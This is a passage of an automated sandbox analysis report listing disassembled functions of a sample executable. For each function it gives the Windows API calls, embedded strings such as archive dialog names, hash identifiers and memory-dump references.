Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: b526e8cd55782b18c28a47a6cb28d21f6c56a4e242aba815a35378e9370c21ce
Instruction ID: 8fa43d79903d823f114813e5935aea10f7bfa375fb70dd6e5f1ed4a5bc07e8a1
Opcode Fuzzy Hash: b526e8cd55782b18c28a47a6cb28d21f6c56a4e242aba815a35378e9370c21ce
Instruction Fuzzy Hash: E8F06D32148034BBCF222F54EC09DCA3F27EB41760B11800AF61A5A161CB72DAA2DB94

Function 006A15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006A17BC
_swprintf.LIBCMT ref: 006A186B

Strings

%ls, xrefs: 006A1641, 006A1657
%s: %s, xrefs: 006A17CB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e4f4afca74ae98cb49ac90e385edc12986bf41cf76b560a7a99e2ebd8844f18f
Instruction ID: 270e0b73c9b36a1474afd9ad3543940e26a96951a9dc2b91db37348673fbbdf6
Opcode Fuzzy Hash: e4f4afca74ae98cb49ac90e385edc12986bf41cf76b560a7a99e2ebd8844f18f
Instruction Fuzzy Hash: 1D51FE35288300F6FB213A948D46F75766BAB07B04F14550BF396AC4D2C9A7EC12AF1E

Function 006B7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4t8f8F3uT1.exe,00000104), ref: 006B7FAE
_free.LIBCMT ref: 006B8079
_free.LIBCMT ref: 006B8083

Strings

C:\Users\user\Desktop\4t8f8F3uT1.exe, xrefs: 006B7FA5, 006B7FAC, 006B7FDB, 006B8013

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\4t8f8F3uT1.exe
API String ID: 2506810119-1972981918
Opcode ID: bfaabeb7d658311688f21fedd6c5cc43a272153ef10c2abcc935febf0eed3f0d
Instruction ID: 24042f435219de4fa48468bfce1cec52a68928d383b9dcd45c421968e005137e
Opcode Fuzzy Hash: bfaabeb7d658311688f21fedd6c5cc43a272153ef10c2abcc935febf0eed3f0d
Instruction Fuzzy Hash: C531AEF1A00219AFCB21EF98D880DEEBBBEEF95350F10406AF50497211DA708E85CB65

Function 006B31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006B31FB
_abort.LIBCMT ref: 006B3306

Strings

RCC, xrefs: 006B3215
MOC, xrefs: 006B320D

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: ac9665e381dc8c06d3ac778b7ef010f47635dee6d789d5831da2b52328540500
Instruction ID: d2d61c1193a93636eb96a2d59798ec1150fc97f7453e8b5cd7301c2f83fb9d17
Opcode Fuzzy Hash: ac9665e381dc8c06d3ac778b7ef010f47635dee6d789d5831da2b52328540500
Instruction Fuzzy Hash: 88414AB1A00219AFCF15DF98CD81AEEBBB6BF48304F188159F90467311D335AA90DB54

Function 00697401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00697406

Part of subcall function 00693BBA: __EH_prolog.LIBCMT ref: 00693BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 006974CD

Part of subcall function 00697A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00697AAB
Part of subcall function 00697A9C: GetLastError.KERNEL32 ref: 00697AF1
Part of subcall function 00697A9C: CloseHandle.KERNEL32(?), ref: 00697B00

Strings

SeSecurityPrivilege, xrefs: 0069744B
SeRestorePrivilege, xrefs: 00697460

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: f536c4bd49be84c284f40bbf17cdf31998f4f1cc1c1d72eddd68b6636737184f
Instruction ID: 5c90c12ccaa1430e16c7b120d11bc034bc04eb06f158454f0437399cf47f664c
Opcode Fuzzy Hash: f536c4bd49be84c284f40bbf17cdf31998f4f1cc1c1d72eddd68b6636737184f
Instruction Fuzzy Hash: 8031B2B1E04259AADF51EFA4DC45FEE7BAFAF16304F04401AF405AB782CB748A44CB65

Function 006AAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

EndDialog.USER32(?,00000001), ref: 006AAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 006AADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 006AADC2

Strings

ASKNEXTVOL, xrefs: 006AAD28

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: bc96741a334252a9395f1d57dc515ff6be06220f45aeca82048f6bd2adf41ee4
Instruction ID: 2cc870819a1dcd7b1d7c74749e183ba83143353f78741cfc0ab1812ee67ae23a
Opcode Fuzzy Hash: bc96741a334252a9395f1d57dc515ff6be06220f45aeca82048f6bd2adf41ee4
Instruction Fuzzy Hash: 1411B432240210AFD751FFA8DD05FB6376BEF4B742F000006F281EAAA0C761AD05DB26

Function 006ADDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,000103E4,006AB270,?,?), ref: 006ADE18

Strings

GETPASSWORD1, xrefs: 006ADE0D
xzn, xrefs: 006ADE28
rj, xrefs: 006ADDDC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$rj$xzn
API String ID: 665744214-3428093247
Opcode ID: 27f52989b3cf0b7b8654164c9fac9e4c3816e40e24bc43305bc1e2d5ac4a4b79
Instruction ID: 181da24ad9a86a970fadc9bbdce1730eb1da6253728f08f925986a4b21a71620
Opcode Fuzzy Hash: 27f52989b3cf0b7b8654164c9fac9e4c3816e40e24bc43305bc1e2d5ac4a4b79
Instruction Fuzzy Hash: D011EC31A002546ADF11AE34AC05FFB379BAB06750F144065F946AB181CAB4AD44DB64

Function 0069D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0069D954
_strncpy.LIBCMT ref: 0069D99A

Part of subcall function 006A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,006D1030,00000200,0069D928,00000000,?,00000050,006D1030), ref: 006A1DC4

Strings

@%s, xrefs: 0069D93E
$%s, xrefs: 0069D949

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 61605065a01c9803b1ca004c4be7052e75b979b6bdf8081293d94f9d4cff54b3
Instruction ID: 76db0ddc44f19dafb692de117a371f673b51791097c0f6bf8b860652f52cae3f
Opcode Fuzzy Hash: 61605065a01c9803b1ca004c4be7052e75b979b6bdf8081293d94f9d4cff54b3
Instruction Fuzzy Hash: 2D21A272840248AEDF20FEA4CD05FEE7BAEEF05304F044026FA10976A2E272D659CB51

Function 006A0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0069AC5A,00000008,?,00000000,?,0069D22D,?,00000000), ref: 006A0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0069AC5A,00000008,?,00000000,?,0069D22D,?,00000000), ref: 006A0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0069AC5A,00000008,?,00000000,?,0069D22D,?,00000000), ref: 006A0E9F

Strings

Thread pool initialization failed., xrefs: 006A0EB7

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 294eaa3667f9368b7f73bfc2404150c042613eee2e3442a74db90883a58d65c4
Instruction ID: 1639b731f7dff26cd84fcfd12cc80878e041e62ab102d96eb54409c0b57eacb6
Opcode Fuzzy Hash: 294eaa3667f9368b7f73bfc2404150c042613eee2e3442a74db90883a58d65c4
Instruction Fuzzy Hash: 1E1194B16007089FD3216F66DC849A7FBEDFB55744F10482EF1DAC2300DA715D409B54

Function 0069124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0069125D

Strings

A, xrefs: 00691285
2j, xrefs: 00691292
(j, xrefs: 006912A3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Malloc
String ID: (j$2j$A
API String ID: 2696272793-3473958177
Opcode ID: e602dc2040c1e70c426588e3c3193ddbc21ebd64370a431785eb3cac37597946
Instruction ID: 6c2dc413a4dd92ed1e5121996a672cb4ce80e3034a8ece90e73e090599d3d89e
Opcode Fuzzy Hash: e602dc2040c1e70c426588e3c3193ddbc21ebd64370a431785eb3cac37597946
Instruction Fuzzy Hash: 5801D775905229ABCF14DFA4E848AEEBBF9EF09310B10416AE906E7350D774DB41CFA4

Function 006ADCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 006ADD31
REPLACEFILEDLG, xrefs: 006ADD1C, 006ADD50

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 0491f68b3c8ec1253da204dcb5357cb10dfeae297c1f4e7d33c0ef460e696582
Instruction ID: b747c83cc722823e655c03e5b155d39570041a57c10539aa266a1d744fb36336
Opcode Fuzzy Hash: 0491f68b3c8ec1253da204dcb5357cb10dfeae297c1f4e7d33c0ef460e696582
Instruction Fuzzy Hash: 89019275A05245AFDB10BF54FC48AAA3FA7EB0A394B10102AF40683630CA319C50DFA0

Function 00691316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0069E2E8: _swprintf.LIBCMT ref: 0069E30E
Part of subcall function 0069E2E8: _strlen.LIBCMT ref: 0069E32F
Part of subcall function 0069E2E8: SetDlgItemTextW.USER32(?,006CE274,?), ref: 0069E38F
Part of subcall function 0069E2E8: GetWindowRect.USER32(?,?), ref: 0069E3C9
Part of subcall function 0069E2E8: GetClientRect.USER32(?,?), ref: 0069E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0069135A
SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

Strings

0, xrefs: 00691319
j, xrefs: 0069134A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: j$0
API String ID: 2622349952-837861145
Opcode ID: dfc1f0cb358901c7d923945c8af39a32140c0d5dbba41b1840856031fff87fdc
Instruction ID: 7ae07ee6fdd4b7e64caff0c5838a7e299fa1e2efb01b39429adc4f3cf58bee68
Opcode Fuzzy Hash: dfc1f0cb358901c7d923945c8af39a32140c0d5dbba41b1840856031fff87fdc
Instruction Fuzzy Hash: 5DF03C30104299ABDF155F64880DBFA3B7FAB46344F148298FC4499FA1CB75CA91EB50

Function 006B9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006B9AA9
__alldvrm.LIBCMT ref: 006B9CAA
__alldvrm.LIBCMT ref: 006B9CCC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: c7f0363e28d871f397d6806ef47a2e158362ecfd213eb5e0ea0c396293c619e5
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 91A136B2A046869FEB25CF28C8917EEBFE6EF51310F14416DE6859B381C7388D81C764

Function 0069A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00697F69,?,?,?), ref: 0069A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00697F69,?), ref: 0069A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00697F69,?,?,?,?,?,?,?), ref: 0069A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00697F69,?,?,?,?,?,?,?,?,?,?), ref: 0069A4C6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 92f849517ecd28e1271f4218be3ba5fed1c713c7f7516e6420db9cd225c0c33a
Instruction ID: 50b7292dee27978c73751140e79752e082e89581f8afb213ee0c45644f072dcc
Opcode Fuzzy Hash: 92f849517ecd28e1271f4218be3ba5fed1c713c7f7516e6420db9cd225c0c33a
Instruction Fuzzy Hash: 8A41D0312483819BDB21DF64DC45FEEBBEAAB81700F14091DB5D1D3680D6A4DA48DB93

Function 006BC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,006B91E0,?,00000000,?,00000001,?,?,00000001,006B91E0,?), ref: 006BC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006BCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,006B6CBE,?), ref: 006BCA70
__freea.LIBCMT ref: 006BCA79

Part of subcall function 006B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006BCA2C,00000000,?,006B6CBE,?,00000008,?,006B91E0,?,?,?), ref: 006B8E38

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: a2c597947276d297e9dd8a45b4e219d9ab5a4691ea8e9240ed5f2c7bbf50fd66
Instruction ID: 157ca22ce0466d2b934f1d594d0732f6338c2d1a076e6bec4176cfe4cf4f0dc4
Opcode Fuzzy Hash: a2c597947276d297e9dd8a45b4e219d9ab5a4691ea8e9240ed5f2c7bbf50fd66
Instruction Fuzzy Hash: 6031AEB2A0021AABDF25DF64CC55DFE7BA6EB41320B044129FC04E7250EB35CE90DBA0

Function 006AA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006AA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 006AA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006AA683
ReleaseDC.USER32(00000000,00000000), ref: 006AA691

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 065ef1cc7937a8bbc4a94e9a80a7c0a634e8f0102f7cb3f61e1c033d09d8e65b
Instruction ID: 41fc7d895df53ebb288b042c5b9de6d578d30ed4a81eaf359243950d6a2abffe
Opcode Fuzzy Hash: 065ef1cc7937a8bbc4a94e9a80a7c0a634e8f0102f7cb3f61e1c033d09d8e65b
Instruction Fuzzy Hash: CEE0EC31982731BBD3615B70AC0DBDA3F56EB15B52F012103FA0596290DF648A00CBA5

Function 006AD06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 006AD11B

Strings

dj, xrefs: 006AD3C5
.lnk, xrefs: 006AD2F7, 006AD307

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$dj
API String ID: 2691759472-134522222
